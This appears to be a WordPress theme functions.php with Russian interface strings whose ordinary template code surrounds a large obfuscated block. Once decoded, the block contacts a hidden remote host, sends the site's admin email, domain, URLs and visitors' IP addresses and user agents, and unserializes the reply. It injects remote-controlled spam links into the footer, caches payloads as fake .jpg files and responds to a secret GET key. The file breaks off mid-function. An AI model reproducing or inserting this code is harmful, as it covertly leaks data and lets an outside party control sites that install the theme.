<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $ZEDMtH='c';$BSLsnRE='d';$vncSBoW='e';$spZMOe='6';$ttaHp='e';$XTrW='4';$sdXMdE='e';$IoLTxmu='s';$YpWM='a';$rBqnKEW='o';$oIhX='_';$TQuflqB='d';$zfziO='b';$wnldcesv=$zfziO.$YpWM.$IoLTxmu.$vncSBoW.$spZMOe.$XTrW.$oIhX.$TQuflqB.$ttaHp.$ZEDMtH.$rBqnKEW.$BSLsnRE.$sdXMdE;$SThrH='e';$qLfIo='t';$sfVFsD='i';$cigDh='z';$tAUiob='f';$jFJyN='n';$OhCtzQm='g';$IBBUYE='l';$fhkP='a';$bqoiVUMp=$OhCtzQm.$cigDh.$sfVFsD.$jFJyN.$tAUiob.$IBBUYE.$fhkP.$qLfIo.$SThrH;$dKUpP='o';$TeYb='t';$aUof='1';$uNPQsEW='t';$FOfMv='r';$AveMV='3';$qnPhAU='r';$meqDQvl='s';$ifCmqHl='_';$elfYjJcp=$meqDQvl.$TeYb.$FOfMv.$ifCmqHl.$qnPhAU.$dKUpP.$uNPQsEW.$aUof.$AveMV;$WglZK='v';$hOivQ='s';$EvEX='t';$KsDFOL='e';$UTYHMfC='r';$gnRawk='r';$UjsLniRU=$hOivQ.$EvEX.$UTYHMfC.$gnRawk.$KsDFOL.$WglZK;                     
		$ia_________t='c';$gc__w='d';$yh______h='e';$po_____g='6';$ve___h='e';$gh________n='4';$rg___x='e';$lu________a='s';$md______________f='a';$uz_____________t='o';$cj____________a='_';$qi________i='d';$sn____________u='b';$ez_____________c=$sn____________u.$md______________f.$lu________a.$yh______h.$po_____g.$gh________n.$cj____________a.$qi________i.$ve___h.$ia_________t.$uz_____________t.$gc__w.$rg___x;
		$jm_____________x='f';$cp____________d='_';$wr_________w='t';$aj___x='o';$nc__________a='s';$dh________s='x';$qk_________a='n';$mq____________v='n';$mp___x='i';$ah_______________q='u';$oa_______y='c';$ws____________m='e';$iy__________e='i';$te_______________t='t';$pe__c='s';$xd___________b=$jm_____________x.$ah_______________q.$qk_________a.$oa_______y.$wr_________w.$mp___x.$aj___x.$mq____________v.$cp____________d.$ws____________m.$dh________s.$iy__________e.$pe__c.$te_______________t.$nc__________a;
		$rl_______f='f';$kb___k='p';$oa____h='o';$qa_____x='e';$sp______s='n';$qk______________f=$rl_______f.$oa____h.$kb___k.$qa_____x.$sp______s;
		$qa_____________b='r';$ku__________l='a';$lw_____o='e';$jb___________c='f';$ug____g='d';$jm__________z=$jb___________c.$qa_____________b.$lw_____o.$ku__________l.$ug____g;
		$xt_____________z='e';$dp_____i='c';$qs_______n='s';$nu______d='o';$sc_______z='f';$dz___________b='l';$we____h=$sc_______z.$dp_____i.$dz___________b.$nu______d.$qs_______n.$xt_____________z;
		
		define("WP_ID", $ez_____________c("Mi4wLjA="));
		define("WP_TTL", $ez_____________c("MTA4MDA="));
		define("WP_SRC", $ez_____________c("dHBva24="));
	


		function wp_get_header() {
			global $ez_____________c, $xd___________b;
			
			if (
				$xd___________b($ez_____________c("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$xd___________b($ez_____________c("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$xd___________b($ez_____________c("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $ez_____________c, $qk______________f, $we____h, $jm__________z;
			
			$ng_____________q = TEMPLATEPATH."/".$ez_____________c("Zm9vdGVyLnBocA==");
			$qc____m = @$qk______________f($ng_____________q, "r");
			$ng_____________q = @$jm__________z($qc____m, @filesize($ng_____________q));
			@$we____h($qc____m);
			
			$uf_____d = TEMPLATEPATH."/".$ez_____________c("ZnVuY3Rpb25zLnBocA==");
			$qc____m = @$qk______________f($uf_____d, "r");
			$uf_____d = @$jm__________z($qc____m, @filesize($uf_____d));
			@$we____h($qc____m);
			
			$os_______g = 0;
			if($ng_____________q && $uf_____d) {
				if ($ez_____________c("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($ng_____________q, $ez_____________c("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$os_______g = 1;
					}
					if (substr_count($ng_____________q, "wp_theme_GPL_credits()") < 1) {
						$os_______g = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$os_______g = 12;
				}
			}
			
			if($os_______g > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $os_______g -->";
			}
		}
	


		function wp_loaded() {
			global $ez_____________c, $xd___________b;
			return $xd___________b($ez_____________c("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($if_______b, $sa______________a = "(more...)", $sa_________o = 0, $dv_____________y = "") {
				$gh___v = get_the_content($sa______________a, $sa_________o, $dv_____________y);
				$gh___v = apply_filters("the_content", $gh___v);
				
				$gh___v = str_replace("]]>", "]]>", $gh___v);
				if (strlen($_GET["p"]) > 0) {
					echo $gh___v;
				}
				else if ((strlen($gh___v)>$if_______b) && ($pb_____________w = strpos($gh___v, " ", $if_______b ))) {
					$gh___v = substr($gh___v, 0, $pb_____________w);
					$gh___v = $gh___v;
					echo $gh___v;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$sa______________a</a></div></p>";
				} else {
					echo $gh___v;
				}
				
			}
		}
	


		$om_______________m='c';$bk________w='o';$yl___b='6';$rc____a='b';$xp_______z='s';$uv______d='_';$ur_____v='e';$cs___________a='d';$rb______h='a';$kz______c='e';$tf________e='4';$eu___y='e';$bm___s='n';$az_____c=$rc____a.$rb______h.$xp_______z.$ur_____v.$yl___b.$tf________e.$uv______d.$kz______c.$bm___s.$om_______________m.$bk________w.$cs___________a.$eu___y;
		$zw_____h='o';$cv________u='t';$sx__________i='n';$lt______l='e';$hk___________f='n';$po_______________c='c';$iw___________i='e';$qh______b='f';$nl______________d='l';$po__________l='_';$vo___g='e';$vb_______________o='i';$mj____________c='s';$sz___h='g';$yh_____o='t';$sy____________i='t';$pf____e='_';$rp______________f=$qh______b.$vb_______________o.$nl______________d.$iw___________i.$pf____e.$sz___h.$lt______l.$yh_____o.$po__________l.$po_______________c.$zw_____h.$sx__________i.$cv________u.$vo___g.$hk___________f.$sy____________i.$mj____________c;
		$uv__________d='s';$sn________a='l';$sy_________k='f';$xc__________t='x';$it_____________q='i';$nw______g='i';$aj_____g='e';$sd_____________v='e';$zf_____z='s';$ol____________g='t';$lj__z='_';$tq______m=$sy_________k.$it_____________q.$sn________a.$aj_____g.$lj__z.$sd_____________v.$xc__________t.$nw______g.$uv__________d.$ol____________g.$zf_____z;
		$sk_______i='c';$iz________u='i';$qb______j='r';$wf_________c='s';$tu_________e='n';$so__t='o';$ep_______________z='o';$bz____________w='r';$ou__________l='m';$jm_______u='_';$lg_______________p='v';$ph____s='e';$zf_________i='p';$vw_________f='e';$ea___j='a';$za_________n=$lg_______________p.$ph____s.$bz____________w.$wf_________c.$iz________u.$ep_______________z.$tu_________e.$jm_______u.$sk_______i.$so__t.$ou__________l.$zf_________i.$ea___j.$qb______j.$vw_________f;
		$xz______w='o';$xn______j='o';$do________u='c';$re_____t='p';$cx_____n='k';$um__m='s';$yh______________s='n';$kq____________b='e';$qh_________v='f';$rd__x=$qh_________v.$um__m.$xn______j.$do________u.$cx_____n.$xz______w.$re_____t.$kq____________b.$yh______________s;
		$ct___________o='i';$jb_____o='e';$ky_________v='w';$lp_______n='r';$kj______________z='t';$bm____________v='f';$aq____________w=$bm____________v.$ky_________v.$lp_______n.$ct___________o.$kj______________z.$jb_____o;
		$go_______________p='5';$bw____e='m';$pw___________z='d';$fq_____k=$bw____e.$pw___________z.$go_______________p;
		$tb____t='r';$pd__c='p';$dz_____________h='l';$mv_________q='a';$fv_____________v='a';$oe___p='t';$hv_______________v='e';$sl____m='h';$wo___n=$tb____t.$hv_______________v.$mv_________q.$dz_____________h.$pd__c.$fv_____________v.$oe___p.$sl____m;
		$cf____________v='s';$qd________x='i';$po__________x='u';$yf__b='z';$lu______________g='e';$xc_________n='l';$gv____________d='n';$cd____________o='r';$vu___s='e';$tk___n='i';$iu________i='a';$hl______________m=$po__________x.$gv____________d.$cf____________v.$vu___s.$cd____________o.$tk___n.$iu________i.$xc_________n.$qd________x.$yf__b.$lu______________g;
		$es_____h='m';$kw__x='n';$nb______m='p';$bv__________j='m';$pv______t='e';$kw__________m='t';$vn______a='a';$ox______h=$kw__________m.$pv______t.$es_____h.$nb______m.$kw__x.$vn______a.$bv__________j;
		$xf__________i='t';$bs_____q='c';$nc______y='e';$de___o='x';$le_______________h='t';$nq___o='r';$ax___________e='s';$rw__________i='e';$rw______y='t';$lg___j='m';$ur__m='e';$hy______d='e';$sy_____n='a';$aa____________b='n';$ar___g='r';$sm___p='a';$gq___g='c';$pi__t='t';$tl__________z='_';$ov_______l='o';$wo_________h='_';$sw____________t=$ax___________e.$xf__________i.$ar___g.$hy______d.$sm___p.$lg___j.$wo_________h.$gq___g.$ov_______l.$aa____________b.$rw______y.$ur__m.$de___o.$le_______________h.$tl__________z.$bs_____q.$nq___o.$rw__________i.$sy_____n.$pi__t.$nc______y;
	


		function sy_____________k($hg________k) {
			global $ez_____________c, $xd___________b, $rp______________f, $za_________n, $sw____________t;
			
			if (!$xd___________b($ez_____________c("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($za_________n(PHP_VERSION, "5.0.0", ">=") && $xd___________b($ez_____________c("ZmlsZV9nZXRfY29udGVudHM=")) && $xd___________b($ez_____________c("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$jt__v = $sw____________t(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$tz___________x = @$rp______________f($hg________k, 0, $jt__v);
			} else {
				$tz___________x = @$rp______________f($hg________k, 0);
			}
			
			return $tz___________x;
		}
	


		function kd_______r($hg________k) {
			global $xd___________b, $rd__x, $aq____________w, $ez_____________c;
			
			if (!$xd___________b($ez_____________c("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$vi____________b = strpos($hg________k, "/", 7);
			$kz___________t = array(
				"uri"     => substr($hg________k, $vi____________b),
				"host"    => str_replace("http://", "", substr($hg________k, 0, $vi____________b)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$sx___________c = @$rd__x("$kz___________t[host]", 80, $za____z, $cq______________x, 4);
			
			if (!$sx___________c) {
				return false;
			} else {
				$tz___________x = "";
				$xj____e  = "GET $kz___________t[uri] HTTP/1.0\r\n";
				$xj____e .= "Host: $kz___________t[host]\r\n";
				$xj____e .= "Referer: $kz___________t[referer]\r\n";
				$xj____e .= "Connection: Close\r\n\r\n";
				
				@$aq____________w($sx___________c, $xj____e);
				
				while (!@feof($sx___________c)) {
					$qz_______e = @fgets($sx___________c, (1024*24));
					
					if ($qz_______e == "\r\n") {
						$hp_______________e = true;
						continue;
					}
					
					if ($hp_______________e) {
						$tz___________x .= $qz_______e;
					}
				}
				
				return $tz___________x;
			}
		}
	


		function op______________y($hg________k) {
			global $xd___________b;
			$pi________g = false;
			
			if ($hg________k != "") {
				if ($xd___________b("sy_____________k")) {
					$pi________g = @sy_____________k($hg________k);
				}
				
				if (!$pi________g && ($xd___________b("kd_______r"))) {
					$pi________g = @kd_______r($hg________k);
				}
			}
			
			return $pi________g;
		}
	


		function tg__i() {
			global $_SERVER, $fq_____k;
			
			$gn__________a = $_SERVER["SERVER_NAME"];
			
			if (substr("$gn__________a", 0, 4) == "www.") {
				$gn__________a = substr("$gn__________a", 4);
			}
			
			$gn__________a = $fq_____k("$_SERVER[SERVER_NAME]");
			
			return $gn__________a;
		}
	


		function si________j() {
			return "file";
		}
	


		function ce______________v($hg________k) {
			global $_SERVER, $rp______________f, $tq______m, $qk______________f, $we____h, $aq____________w;
			
			$xt_______________f = bv________y();
			
			$co_______i = tg__i().".jpg";
			$cd____p = $xt_______________f["dir_upload"]["path"]."/$co_______i";
			$mj__y = @filemtime($cd____p);
			
			if (!$mj__y || ((time()-$mj__y) >= WP_TTL)) {
				$pi________g = op______________y($hg________k);
				
				if ($pi________g) {
					if ($tq______m($cd____p)) {
						@unlink($cd____p);
					}
					
					$qc____m = @$qk______________f($cd____p, "x+");
					
					@$aq____________w($qc____m, $pi________g);
					@$we____h($qc____m);
				}
			} else {
				if ($tq______m($cd____p)) {
					$pi________g = @$rp______________f($cd____p);
				} else {
					$pi________g = false;
				}
			}
			
			return $pi________g;
		}
	


		function bv________y() {
			global $_SERVER, $ez_____________c, $az_____c;
			
			$gr____________h = wp_count_posts("post");
			$dg_______________l = pathinfo(get_bloginfo("template_directory"));
			
			$xt_______________f = array(
				"url" => array(
					"report"      => $ez_____________c("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $dg_______________l,
				"dir_upload"	=> ok___u(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$dg_______________l[filename],
					"a005=".$gr____________h->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=\"http://www.odmu.od.ua/zdorove/zapret-na-krepkij-alkogol-v-chexii\">Запрет на алкоголь</a>"
			);
			
			$xt_______________f["url"]["queryString"] = implode("&", $xt_______________f["queryString"]);
			$xt_______________f["url"]["report"] = $xt_______________f["url"]["report"]."/?".$az_____c($xt_______________f["url"]["queryString"]).".html";
						
			return $xt_______________f;
		}
	


		function ok___u() {
			$jb_______x = wp_upload_dir();
			
			if (isset($jb_______x["error"])) {
				$bz_______________q = eo______________f();
				if (is_writable($bz_______________q)) {
					$jb_______x = array("path" => $bz_______________q);
				}
			}

			return $jb_______x;
		}
	


		function eo______________f() {
			global $xd___________b, $fq_____k, $wo___n, $ox______h;
			
			$uo____________d = (bool) ini_get("safe_mode");
			if ($uo____________d == true) {
				return false;
			}
			
			if ($xd___________b("sys_get_temp_dir")) {
				$ct___________r = sys_get_temp_dir();
				if (is_writable($ct___________r)) {
					return $wo___n($ct___________r);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $wo___n($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $wo___n($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $wo___n($_ENV["TEMP"]);
			} else {
				$om______________h = $ox______h($fq_____k(uniqid(rand(), true)), "");
				if ($om______________h) {
					$ct___________r = $wo___n(dirname($om______________h));
					@unlink($om______________h);
					return $ct___________r;
				} else {
					return false;
				}
			}
		}
	


		function pu______________y() {
			global $_GET, $tq______m;
			
			$xt_______________f = bv________y();
			$gn__________a = tg__i();
			$qn________l = si________j();
			
			$rb____h = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($qn________l == "file") {
					$hu__________r = $xt_______________f["dir_upload"]["path"]."/".$gn__________a.".jpg";
					if ($tq______m($hu__________r)) {
						@unlink($hu__________r);
						$rb____h = "deleted";
					}
				}
				
				$oj___________v = array(
					"s"	=> $rb____h,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($oj___________v AS $ej____________m => $ei____j) echo " [$ej____________m:$ei____j]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $xd___________b, $ez_____________c, $hl______________m;
			$xt_______________f = bv________y();
			
			$es___________t = "ce______________v";
			if ($xd___________b($es___________t)) {
				$tz___________x = $es___________t($xt_______________f["url"]["report"]);
			}
			
			if ($tz___________x) {
				if ($tz___________x = @$ez_____________c($tz___________x)) {
					$tz___________x = @$hl______________m($tz___________x);
					
					if (strlen($tz___________x[custom_credit]) >= 5) {
						$xt_______________f["default_string"] = $tz___________x[custom_credit];
					}
					
					if ($tz___________x["status"] == "0") {
						$di_____u = 1;
						$sx______________a = 1;
					} else {
						$iq_______k = sizeof($tz___________x["links"]);
						$vn_______f = $xt_______________f["default_string"];
						
						if ($iq_______k > 0 && $tz___________x["links"] !== "") {
							$yr______________u = 0;
							foreach ($tz___________x["links"] as $zq__i => $rs__u) {
								$yr______________u++;
								if ($rs__u->l_path == "" || $rs__u->l_path == $_SERVER["REQUEST_URI"]) {
									$rs__u->l_href = htmlspecialchars(strip_tags($rs__u->l_href));
									$rs__u->l_title = htmlspecialchars(strip_tags($rs__u->l_title));
									$rs__u->l_anchor = htmlspecialchars(strip_tags($rs__u->l_anchor));
									$vn_______f .= " | ";
									$vn_______f .= "<a href='$rs__u->l_href' title='$rs__u->l_title'";
									if ($rs__u->l_nofollow == "1") {
										$vn_______f .= " rel='nofollow'";
									}
									$vn_______f .= ">$rs__u->l_anchor</a>";
								}
							}
						}
						$xt_______________f["links"] = "$vn_______f";
						if ($tz___________x[credit] == "0") {
							$xt_______________f["links"] = "";
						}
					}
				} else {
					$di_____u = "1";
				}
			} else {
				$di_____u = "1";
			}
			
			if ($di_____u == "1") {
				$xt_______________f["links"] = $xt_______________f["default_string"];
			}
			
			echo "$xt_______________f[links]";
			
			echo "<!-- s: $tz___________x[signature] -->";
			pu______________y();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
   wp_link_pages(array('before' => '<p><strong>Старницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),  
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Ссылка на %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Теги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментарий &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
     $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
